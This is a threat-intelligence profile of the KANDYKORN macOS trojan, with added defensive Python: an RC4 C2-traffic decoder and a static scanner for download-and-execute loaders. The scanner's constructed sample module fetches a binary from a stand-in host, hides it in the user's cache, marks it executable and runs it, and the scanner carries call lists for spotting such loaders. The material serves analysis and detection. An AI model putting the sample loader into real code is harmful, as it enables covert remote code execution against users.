KANDYKORN | |
Type of Malware | Trojan |
Country of Origin | North Korea |
Date of initial activity | 2023 |
Associated Groups | BlueNoroff |
Motivation | Financial Gain |
Type of Information Stolen | Cryptocurrencies |
Attack Vectors | Phishing |
Targeted Systems | macOS |
Overview
KANDYKORN is a macOS remote access trojan (RAT) attributed to North Korean state-sponsored operators and first documented publicly by Elastic Security Labs in late 2023. It is not a commodity stealer sprayed at consumers; it was built for a narrow, high-value objective: persistent, interactive access to the workstations of blockchain engineers at a cryptocurrency exchange, where one compromised developer account, wallet or signing key translates directly into stolen funds.
The campaign relied on social engineering rather than an exploit. Operators posing as members of the blockchain community approached targets on Discord and persuaded them to download and run a Python application presented as a cryptocurrency arbitrage bot. That script was the first link in a multi-stage chain that ended with the KANDYKORN implant being loaded directly into memory, leaving little on disk for a responder to find. Once resident, the implant gives the operator file-system access, command execution and an encrypted command-and-control channel, which is why it matters to anyone running macOS developer fleets in the crypto sector.
Targets
Information
Finance and Insurance
How they operate
The infection begins with social engineering rather than an exploit. Operators posing as members of the blockchain community contacted engineers on Discord and talked them into downloading a ZIP archive containing a Python application presented as a cryptocurrency arbitrage bot, exactly the kind of tool a developer at an exchange might plausibly try out. The visible entry script does nothing overtly hostile; the malicious behaviour sits in a module it imports, which fetches the next stage from an attacker-controlled server and runs it. Because the victim launches the script themselves, no vulnerability is needed and the first stage already runs with the user's full rights.
Execution proceeds as a chain of downloaders. The Python stages retrieve an obfuscated loader binary, SUGARLOADER, which contacts the command-and-control (C2) server, downloads the KANDYKORN implant and executes it directly in memory, so the final payload never has to exist as a file on disk. Persistence is handled by a separate component, HLOADER, which takes the place of the Discord application's main executable while the legitimate binary is kept under another name inside the bundle. Each time the user opens Discord, HLOADER launches the real client so nothing looks wrong, then starts the loader again. Tying persistence to an application the target already opens every day sidesteps the LaunchAgent and cron entries that macOS defenders routinely inspect.
Once resident, KANDYKORN behaves as a conventional remote access trojan. Its command handlers let the operator collect basic host information, list directories and file attributes, upload and download files, run arbitrary shell commands, enumerate and kill processes, and archive directories for retrieval. There is no automated mass collection: the operator works the machine interactively, which fits the objective of locating wallet material, signing keys and internal exchange code on one specific engineer's workstation.
Command and control runs over a direct TCP connection to the operator's server, with traffic encrypted using RC4 rather than TLS. That choice keeps the implant independent of system libraries and produces traffic that looks like an opaque binary stream rather than a recognisable protocol, but it also means that a responder who recovers the key from memory or from the loader can decrypt captured sessions outright, since RC4 offers no forward secrecy.
Defense evasion rests on staging and masquerading rather than on tampering with the host's security controls. The lure is plausible, the loader is obfuscated, the implant lives only in memory, and persistence hides inside the Discord bundle under a name the user trusts. Nothing in public reporting shows the malware disabling macOS logging or security tooling; its stealth comes from leaving those tools little to see.
The impact is financial. The target set, blockchain engineers at a cryptocurrency exchange, together with the operators' track record, points to theft of cryptocurrency as the goal. The RAT is the means of reaching the credentials and keys that make such theft possible; it is not a cryptominer, and no ransomware or destructive behaviour has been attributed to it.
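The RC4-encrypted TCP channel is the point where a responder with a recovered key can turn a packet capture back into operator commands. The following is an added example, not code from the original page or from any published analysis of the malware: a pure-Python RC4 together with a frame parser that tolerates a truncated trailing frame, which is the usual failure mode when reassembling from TCP segments. The framing (a 4-byte little-endian length prefix followed by an RC4-encrypted body whose first 4 bytes are a command identifier), the key and the command numbers are assumptions for illustration; KANDYKORN's real wire format is not described on this page. The sample capture is constructed here with the same routine, and the cipher is checked against a public RC4 test vector before use.

```python
"""RC4 C2 stream decoder (added example; framing, key and command IDs are hypothetical)."""
import struct


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then keystream XOR. The same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm (KSA)
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def known_answer_ok() -> bool:
    """Sanity check against the widely published RC4 vector: key "Key", plaintext "Plaintext"."""
    return rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"


# Hypothetical framing: [u32 LE body length][RC4(body)], body = [u32 LE command][payload].
HEADER = struct.Struct("<I")


def pack_frame(key: bytes, cmd: int, payload: bytes) -> bytes:
    """Build one frame the way the (assumed) operator side would."""
    body = HEADER.pack(cmd) + payload
    return HEADER.pack(len(body)) + rc4(key, body)


def parse_frames(key: bytes, stream: bytes) -> tuple[list[tuple[int, bytes]], bytes]:
    """Decrypt every complete frame in `stream` and return (frames, leftover).

    A truncated final frame (or a nonsensical length) is returned as leftover instead
    of being misparsed, so the caller can append the next TCP segment and call again.
    """
    frames, pos = [], 0
    while len(stream) - pos >= HEADER.size:
        (length,) = HEADER.unpack_from(stream, pos)
        start, end = pos + HEADER.size, pos + HEADER.size + length
        if length < HEADER.size or end > len(stream):
            break                               # body too short for a command, or not all here yet
        body = rc4(key, stream[start:end])
        (cmd,) = HEADER.unpack_from(body, 0)
        frames.append((cmd, body[HEADER.size:]))
        pos = end
    return frames, stream[pos:]


# Constructed capture: two complete operator frames plus one cut off mid-segment.
KEY = b"hypothetical-rc4-key"                   # assumption: a recovered static key
CMD_BASIC_INFO, CMD_LIST_DIR = 0x01, 0x02        # made-up command numbers
CAPTURE = (
    pack_frame(KEY, CMD_BASIC_INFO, b"")
    + pack_frame(KEY, CMD_LIST_DIR, b"/Users/dev/.ssh")
    + pack_frame(KEY, CMD_LIST_DIR, b"/Users/dev/wallets")[:9]   # truncated third frame
)


def decode_capture() -> tuple[list[tuple[int, bytes]], int]:
    """Decode the constructed capture; returns the frames and how many bytes are still pending."""
    frames, leftover = parse_frames(KEY, CAPTURE)
    return frames, len(leftover)


if __name__ == "__main__":
    assert known_answer_ok(), "RC4 implementation does not match the public test vector"
    frames, pending = decode_capture()
    for cmd, payload in frames:
        print(f"cmd=0x{cmd:02x} payload={payload!r}")
    print(f"{pending} byte(s) of an incomplete frame still buffered")
```

Because RC4 is a stream cipher with no integrity protection, the parser trusts the length prefix only after bounds-checking it; a real decoder would also want to validate the command number against the implant's known handler table before acting on anything it prints.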
The defensive lessons follow directly from the chain. Treat unsolicited code from chat contacts as untrusted however relevant it looks, and review what a script imports before running it, since the entry point is designed to look harmless. Alert on python processes that write executables to disk or spawn unsigned Mach-O binaries, and on processes that open raw TCP connections to unfamiliar hosts. Verify the code signature of the Discord bundle, and of any other application with standing user-level access, rather than trusting its name. Finally, keep the ability to capture C2 traffic: once a key is recovered, RC4 sessions can be decrypted in full.
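A first check a defender, or a cautious engineer, can run on a "trading bot" handed over in chat is to look for the download-and-execute shape before running anything. The following is an added example and is not code from this page or from any published analysis: it uses Python's ast module to flag modules that both fetch from the network and execute what they fetched, and it follows local imports so that a clean-looking entry script is reported when a module it imports is the loader. The two sample modules, their names, the URL and the drop path are constructed for the example and are not indicators of anything real.

```python
"""Static triage for download-and-execute loaders in a Python project (added example)."""
import ast
from dataclasses import dataclass, field

# Fully qualified callee names that together form the staged-loader shape:
# fetch bytes from the network, drop them, mark them executable, run them.
FETCH = {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get", "requests.post"}
EXECUTE = {"exec", "eval", "os.system", "os.popen", "os.execv", "os.execvp",
           "subprocess.run", "subprocess.Popen", "subprocess.call",
           "subprocess.check_output", "subprocess.check_call"}
CHMOD = {"os.chmod"}


@dataclass
class Triage:
    fetch: list = field(default_factory=list)      # (line, qualified callee)
    execute: list = field(default_factory=list)
    chmod: list = field(default_factory=list)
    local_imports: set = field(default_factory=set)  # sibling modules this one imports

    @property
    def loader_shape(self) -> bool:
        """Network fetch and execution in the same module is the pattern we care about."""
        return bool(self.fetch) and bool(self.execute)


def _resolve(call: ast.Call, aliases: dict) -> str:
    """Turn a call's callee into a qualified name, honouring import aliases.
    `sp.Popen(...)` after `import subprocess as sp` becomes 'subprocess.Popen'."""
    parts, f = [], call.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if not isinstance(f, ast.Name):
        return ""                                   # e.g. a call on a call result
    parts.append(aliases.get(f.id, f.id))
    return ".".join(reversed(parts))


def triage_source(src: str, local_modules: frozenset = frozenset()) -> Triage:
    t, aliases = Triage(), {}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            for a in node.names:                     # import X.Y [as Z]
                aliases[a.asname or a.name.split(".")[0]] = a.name if a.asname else a.name.split(".")[0]
                if a.name in local_modules:
                    t.local_imports.add(a.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:                     # from X import Y [as Z]
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
            if node.module in local_modules:
                t.local_imports.add(node.module)
        elif isinstance(node, ast.Call):
            name = _resolve(node, aliases)
            if name in FETCH:
                t.fetch.append((node.lineno, name))
            elif name in EXECUTE:
                t.execute.append((node.lineno, name))
            elif name in CHMOD:
                t.chmod.append((node.lineno, name))
    return t


def suspicious_modules(files: dict) -> list:
    """Names of modules that are loaders, plus modules that (transitively) import one.
    The second group matters: the script a victim is told to run usually looks clean."""
    stems = {name.rsplit(".", 1)[0]: name for name in files}
    results = {name: triage_source(src, frozenset(stems)) for name, src in files.items()}
    flagged = {name for name, t in results.items() if t.loader_shape}
    changed = True
    while changed:                                   # propagate along local import edges
        changed = False
        for name, t in results.items():
            if name not in flagged and any(stems[m] in flagged for m in t.local_imports):
                flagged.add(name)
                changed = True
    return sorted(flagged)


# Constructed sample project: a plausible-looking bot whose "updater" is the first stage.
BOT_PY = '''
import time
from updater import check_for_updates   # "keeps the bot current"

PRICES = {"BTC-USDT": (42000.0, 42010.5)}

def best_spread() -> float:
    bid, ask = PRICES["BTC-USDT"]
    return ask - bid

if __name__ == "__main__":
    check_for_updates()
    print(best_spread())
'''
UPDATER_PY = '''
import os
import subprocess as sp
from urllib.request import urlopen

def check_for_updates():
    blob = urlopen("https://updates.example.invalid/latest").read()   # made-up URL
    path = os.path.expanduser("~/Library/Caches/.helper")              # made-up path
    with open(path, "wb") as fh:
        fh.write(blob)
    os.chmod(path, 0o755)
    sp.Popen([path])
'''
SAMPLE_PROJECT = {"bot.py": BOT_PY, "updater.py": UPDATER_PY}


def run_triage() -> list:
    return suspicious_modules(SAMPLE_PROJECT)


if __name__ == "__main__":
    for name, src in SAMPLE_PROJECT.items():
        t = triage_source(src, frozenset({"bot", "updater"}))
        print(f"{name}: fetch={t.fetch} execute={t.execute} chmod={t.chmod}")
    print("flagged:", run_triage())
```

The alias resolution is what keeps this useful against the common evasions of `import subprocess as sp` or `from urllib.request import urlopen as u`; a grep for `subprocess.Popen` would miss both. It is still static triage, not a verdict: code that builds the callee name dynamically or unpacks its real loader from a string will slip past, which is exactly why the page's recommendation to watch python processes at runtime stands alongside this check rather than replacing it.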
MITRE Tactics and Techniques
1. Initial Access
Phishing: Spearphishing via Service (T1566.003): targets were approached on Discord, not by email, and handed a ZIP archive containing the Python lure.
2. Execution
User Execution: Malicious File (T1204.002): the victim runs the "arbitrage bot" themselves, so no exploit is required.
Command and Scripting Interpreter: Python (T1059.006): the first stages are Python scripts that fetch and run the next stage.
3. Persistence
Hijack Execution Flow (T1574): HLOADER is installed in place of the Discord application's main executable so the loader runs each time the user opens Discord.
Masquerading: Match Legitimate Name or Location (T1036.005): the loader carries Discord's name and sits inside its bundle, and the lure presents itself as a trading tool.
4. Defense Evasion
Obfuscated Files or Information (T1027): SUGARLOADER is obfuscated to hinder static analysis.
Reflective Code Loading (T1620): the KANDYKORN implant is downloaded by the loader and executed in memory rather than written to disk.
5. Discovery
System Information Discovery (T1082): the implant reports basic host details to the operator.
File and Directory Discovery (T1083): directory listings and file attributes are available on demand.
Process Discovery (T1057): running processes can be enumerated, and killed, from the C2 channel.
6. Collection
Data from Local System (T1005): files of interest are read from the compromised workstation.
Archive Collected Data (T1560): directories can be archived before retrieval.
7. Command and Control
Encrypted Channel: Symmetric Cryptography (T1573.001): C2 traffic is RC4-encrypted.
Non-Application Layer Protocol (T1095): the implant talks to its server over a direct TCP connection rather than HTTP.
Ingress Tool Transfer (T1105): each stage downloads the next from attacker infrastructure.
8. Exfiltration
Exfiltration Over C2 Channel (T1041): files are uploaded back through the same encrypted connection.
9. Impact
Financial Theft (T1657): the campaign's purpose is theft of cryptocurrency from the targeted exchange.